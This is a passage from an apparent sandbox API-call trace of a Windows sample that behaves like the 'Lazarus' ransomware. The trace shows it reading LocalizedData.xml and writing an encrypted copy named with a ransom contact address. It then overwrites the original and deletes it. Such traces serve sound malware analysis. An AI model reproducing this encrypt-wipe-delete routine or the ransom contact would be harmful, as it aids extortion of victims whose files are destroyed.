hHeap=0x20000) returned 1 [0061.264] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0061.264] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0061.264] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0061.264] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0061.265] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0061.265] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0061.265] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0061.265] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0061.265] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0061.265] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0061.265] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1f0 [0061.265] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0061.265] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0061.265] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0061.265] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0061.265] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0061.265] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1f0 | out: hHeap=0x20000) returned 1 [0061.265] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0061.265] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0061.265] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0061.265] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0061.265] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0061.265] AreFileApisANSI () returned 1 [0061.265] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e1b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0061.265] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71758 [0061.265] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e1b8, cbMultiByte=-1, lpWideCharStr=0x71758, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1028\\LocalizedData.xml") returned 45 [0061.265] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\1028\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1028\\localizeddata.xml"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0xed90)) returned 1 [0061.265] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0061.265] AreFileApisANSI () returned 1 [0061.265] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x327f560, cbMultiByte=-1, lpWideCharStr=0x327f578, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0061.265] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0061.265] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88388 [0061.265] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88810 [0061.265] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88388 | out: hHeap=0x20000) returned 1 [0061.265] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0061.265] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0061.265] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0061.265] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0061.265] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0061.266] GetLastError () returned 0x0 [0061.266] SetLastError (dwErrCode=0x0) [0061.266] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4e030 [0061.266] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x85fc0 [0061.266] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8bd10 [0061.266] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d5a0 [0061.266] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d780 [0061.266] GetLastError () returned 0x0 [0061.266] SetLastError (dwErrCode=0x0) [0061.266] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0061.266] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53718 [0061.266] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5f) returned 0x71758 [0061.266] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53718 | out: hHeap=0x20000) returned 1 [0061.266] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x5e570 [0061.266] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0061.266] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0061.266] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfb0 [0061.266] AreFileApisANSI () returned 1 [0061.266] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x5e570, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 107 [0061.266] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd6) returned 0x51398 [0061.266] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x5e570, cbMultiByte=-1, lpWideCharStr=0x51398, cchWideChar=107 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1028\\LocalizedData.xml.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 107 [0061.266] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1028\\LocalizedData.xml.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\588bce7c90097ed212\\1028\\localizeddata.xml.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0061.267] GetFileType (hFile=0x420) returned 0x1 [0061.267] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x51398 | out: hHeap=0x20000) returned 1 [0061.267] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0061.267] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0061.267] AreFileApisANSI () returned 1 [0061.267] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e0a0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0061.267] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71a98 [0061.267] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e0a0, cbMultiByte=-1, lpWideCharStr=0x71a98, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1028\\LocalizedData.xml") returned 45 [0061.267] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1028\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1028\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f1a8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0061.267] GetFileType (hFile=0x428) returned 0x1 [0061.267] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a98 | out: hHeap=0x20000) returned 1 [0061.267] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x69bb0 [0061.267] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0061.267] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0061.267] GetLastError () returned 0x0 [0061.267] SetLastError (dwErrCode=0x0) [0061.395] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0061.395] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0061.395] GetLastError () returned 0x0 [0061.395] SetLastError (dwErrCode=0x0) [0061.395] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0061.395] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0061.395] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8a210 [0061.395] ReadFile (in: hFile=0x428, lpBuffer=0x8a210, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f030, lpOverlapped=0x0 | out: lpBuffer=0x8a210*, lpNumberOfBytesRead=0x327f030*=0x1000, lpOverlapped=0x0) returned 1 [0061.397] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x400) returned 0x70718 [0061.397] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d768 [0061.397] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8c430 [0061.397] GetLastError () returned 0x0 [0061.397] SetLastError (dwErrCode=0x0) [0061.397] GetLastError () returned 0x0 [0061.397] SetLastError (dwErrCode=0x0) [0061.398] GetLastError () returned 0x0 [0061.398] SetLastError (dwErrCode=0x0) [0061.398] GetLastError () returned 0x0 [0061.398] SetLastError (dwErrCode=0x0) [0061.398] ReadFile (in: hFile=0x428, lpBuffer=0x8a210, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8a210*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0061.399] WriteFile (in: hFile=0x420, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0061.400] GetLastError () returned 0x0 [0061.400] SetLastError (dwErrCode=0x0) [0061.400] GetLastError () returned 0x0 [0061.400] SetLastError (dwErrCode=0x0) [0061.400] GetLastError () returned 0x0 [0061.400] SetLastError (dwErrCode=0x0) [0061.400] GetLastError () returned 0x0 [0061.400] SetLastError (dwErrCode=0x0) [0061.400] ReadFile (in: hFile=0x428, lpBuffer=0x8a210, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8a210*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0061.400] WriteFile (in: hFile=0x420, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0061.400] GetLastError () returned 0x0 [0061.400] SetLastError (dwErrCode=0x0) [0061.401] GetLastError () returned 0x0 [0061.401] SetLastError (dwErrCode=0x0) [0061.401] GetLastError () returned 0x0 [0061.401] SetLastError (dwErrCode=0x0) [0061.401] GetLastError () returned 0x0 [0061.401] SetLastError (dwErrCode=0x0) [0061.401] ReadFile (in: hFile=0x428, lpBuffer=0x8a210, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8a210*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0061.401] WriteFile (in: hFile=0x420, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0061.401] GetLastError () returned 0x0 [0061.401] SetLastError (dwErrCode=0x0) [0061.401] GetLastError () returned 0x0 [0061.401] SetLastError (dwErrCode=0x0) [0061.402] GetLastError () returned 0x0 [0061.402] SetLastError (dwErrCode=0x0) [0061.402] GetLastError () returned 0x0 [0061.402] SetLastError (dwErrCode=0x0) [0061.402] ReadFile (in: hFile=0x428, lpBuffer=0x8a210, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8a210*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0061.402] WriteFile (in: hFile=0x420, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0061.402] GetLastError () returned 0x0 [0061.402] SetLastError (dwErrCode=0x0) [0061.402] GetLastError () returned 0x0 [0061.402] SetLastError (dwErrCode=0x0) [0061.402] GetLastError () returned 0x0 [0061.402] SetLastError (dwErrCode=0x0) [0061.403] GetLastError () returned 0x0 [0061.403] SetLastError (dwErrCode=0x0) [0061.403] ReadFile (in: hFile=0x428, lpBuffer=0x8a210, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8a210*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0061.403] WriteFile (in: hFile=0x420, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0061.403] GetLastError () returned 0x0 [0061.403] SetLastError (dwErrCode=0x0) [0061.403] GetLastError () returned 0x0 [0061.403] SetLastError (dwErrCode=0x0) [0061.403] GetLastError () returned 0x0 [0061.403] SetLastError (dwErrCode=0x0) [0061.403] GetLastError () returned 0x0 [0061.403] SetLastError (dwErrCode=0x0) [0061.404] ReadFile (in: hFile=0x428, lpBuffer=0x8a210, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8a210*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0061.404] WriteFile (in: hFile=0x420, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0061.404] GetLastError () returned 0x0 [0061.404] SetLastError (dwErrCode=0x0) [0061.404] GetLastError () returned 0x0 [0061.404] SetLastError (dwErrCode=0x0) [0061.404] GetLastError () returned 0x0 [0061.404] SetLastError (dwErrCode=0x0) [0061.404] GetLastError () returned 0x0 [0061.404] SetLastError (dwErrCode=0x0) [0061.404] ReadFile (in: hFile=0x428, lpBuffer=0x8a210, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8a210*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0061.405] WriteFile (in: hFile=0x420, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0061.405] GetLastError () returned 0x0 [0061.405] SetLastError (dwErrCode=0x0) [0061.405] GetLastError () returned 0x0 [0061.405] SetLastError (dwErrCode=0x0) [0061.405] GetLastError () returned 0x0 [0061.405] SetLastError (dwErrCode=0x0) [0061.405] GetLastError () returned 0x0 [0061.405] SetLastError (dwErrCode=0x0) [0061.405] ReadFile (in: hFile=0x428, lpBuffer=0x8a210, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8a210*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0061.406] WriteFile (in: hFile=0x420, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0061.406] GetLastError () returned 0x0 [0061.406] SetLastError (dwErrCode=0x0) [0061.406] GetLastError () returned 0x0 [0061.406] SetLastError (dwErrCode=0x0) [0061.406] GetLastError () returned 0x0 [0061.406] SetLastError (dwErrCode=0x0) [0061.406] GetLastError () returned 0x0 [0061.406] SetLastError (dwErrCode=0x0) [0061.406] ReadFile (in: hFile=0x428, lpBuffer=0x8a210, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8a210*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0061.406] WriteFile (in: hFile=0x420, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0061.407] GetLastError () returned 0x0 [0061.407] SetLastError (dwErrCode=0x0) [0061.407] GetLastError () returned 0x0 [0061.407] SetLastError (dwErrCode=0x0) [0061.407] GetLastError () returned 0x0 [0061.407] SetLastError (dwErrCode=0x0) [0061.407] GetLastError () returned 0x0 [0061.407] SetLastError (dwErrCode=0x0) [0061.407] ReadFile (in: hFile=0x428, lpBuffer=0x8a210, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8a210*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0061.407] WriteFile (in: hFile=0x420, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0061.407] GetLastError () returned 0x0 [0061.407] SetLastError (dwErrCode=0x0) [0061.408] GetLastError () returned 0x0 [0061.408] SetLastError (dwErrCode=0x0) [0061.408] GetLastError () returned 0x0 [0061.408] SetLastError (dwErrCode=0x0) [0061.408] GetLastError () returned 0x0 [0061.408] SetLastError (dwErrCode=0x0) [0061.408] ReadFile (in: hFile=0x428, lpBuffer=0x8a210, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8a210*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0061.408] WriteFile (in: hFile=0x420, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0061.408] GetLastError () returned 0x0 [0061.408] SetLastError (dwErrCode=0x0) [0061.408] GetLastError () returned 0x0 [0061.409] SetLastError (dwErrCode=0x0) [0061.409] GetLastError () returned 0x0 [0061.409] SetLastError (dwErrCode=0x0) [0061.409] GetLastError () returned 0x0 [0061.409] SetLastError (dwErrCode=0x0) [0061.409] ReadFile (in: hFile=0x428, lpBuffer=0x8a210, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8a210*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0061.409] WriteFile (in: hFile=0x420, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0061.409] GetLastError () returned 0x0 [0061.409] SetLastError (dwErrCode=0x0) [0061.409] GetLastError () returned 0x0 [0061.409] SetLastError (dwErrCode=0x0) [0061.409] GetLastError () returned 0x0 [0061.410] SetLastError (dwErrCode=0x0) [0061.410] GetLastError () returned 0x0 [0061.410] SetLastError (dwErrCode=0x0) [0061.410] ReadFile (in: hFile=0x428, lpBuffer=0x8a210, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8a210*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0061.410] WriteFile (in: hFile=0x420, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0061.410] GetLastError () returned 0x0 [0061.410] SetLastError (dwErrCode=0x0) [0061.410] GetLastError () returned 0x0 [0061.410] SetLastError (dwErrCode=0x0) [0061.410] GetLastError () returned 0x0 [0061.410] SetLastError (dwErrCode=0x0) [0061.410] GetLastError () returned 0x0 [0061.411] SetLastError (dwErrCode=0x0) [0061.411] ReadFile (in: hFile=0x428, lpBuffer=0x8a210, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8a210*, lpNumberOfBytesRead=0x327f0c4*=0xd90, lpOverlapped=0x0) returned 1 [0061.411] WriteFile (in: hFile=0x420, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0061.411] GetLastError () returned 0x0 [0061.411] SetLastError (dwErrCode=0x0) [0061.411] GetLastError () returned 0x0 [0061.411] SetLastError (dwErrCode=0x0) [0061.411] GetLastError () returned 0x0 [0061.411] SetLastError (dwErrCode=0x0) [0061.411] ReadFile (in: hFile=0x428, lpBuffer=0x8a210, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8a210*, lpNumberOfBytesRead=0x327f0c4*=0x0, lpOverlapped=0x0) returned 1 [0061.411] GetLastError () returned 0x0 [0061.411] SetLastError (dwErrCode=0x0) [0061.412] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d768 | out: hHeap=0x20000) returned 1 [0061.412] WriteFile (in: hFile=0x420, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0xd90, lpNumberOfBytesWritten=0x327ef70, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327ef70*=0xd90, lpOverlapped=0x0) returned 1 [0061.412] GetLastError () returned 0x0 [0061.412] SetLastError (dwErrCode=0x0) [0061.412] GetLastError () returned 0x0 [0061.412] SetLastError (dwErrCode=0x0) [0061.412] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0061.412] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x70718 | out: hHeap=0x20000) returned 1 [0061.412] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0061.412] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69bb0 | out: hHeap=0x20000) returned 1 [0061.412] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c430 | out: hHeap=0x20000) returned 1 [0061.412] CloseHandle (hObject=0x420) returned 1 [0061.414] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a210 | out: hHeap=0x20000) returned 1 [0061.415] CloseHandle (hObject=0x428) returned 1 [0061.415] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfd0 [0061.415] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d070 [0061.415] AreFileApisANSI () returned 1 [0061.415] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e0a0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0061.415] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71960 [0061.415] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e0a0, cbMultiByte=-1, lpWideCharStr=0x71960, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1028\\LocalizedData.xml") returned 45 [0061.415] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1028\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1028\\localizeddata.xml"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0061.416] GetFileType (hFile=0x428) returned 0x1 [0061.416] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0061.417] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8a210 [0061.417] GetLastError () returned 0xb7 [0061.417] SetLastError (dwErrCode=0xb7) [0061.417] WriteFile (in: hFile=0x428, lpBuffer=0x327de50*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x327de4c, lpOverlapped=0x0 | out: lpBuffer=0x327de50*, lpNumberOfBytesWritten=0x327de4c*=0x1, lpOverlapped=0x0) returned 1 [0061.418] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a210 | out: hHeap=0x20000) returned 1 [0061.418] CloseHandle (hObject=0x428) returned 1 [0061.418] AreFileApisANSI () returned 1 [0061.418] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e0a0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0061.418] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71960 [0061.418] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e0a0, cbMultiByte=-1, lpWideCharStr=0x71960, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1028\\LocalizedData.xml") returned 45 [0061.418] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1028\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1028\\localizeddata.xml")) returned 1 [0061.419] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0061.419] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0061.419] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0061.419] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0061.419] HeapFree (in: hHeap=0x20000, dwFlags=0x0, 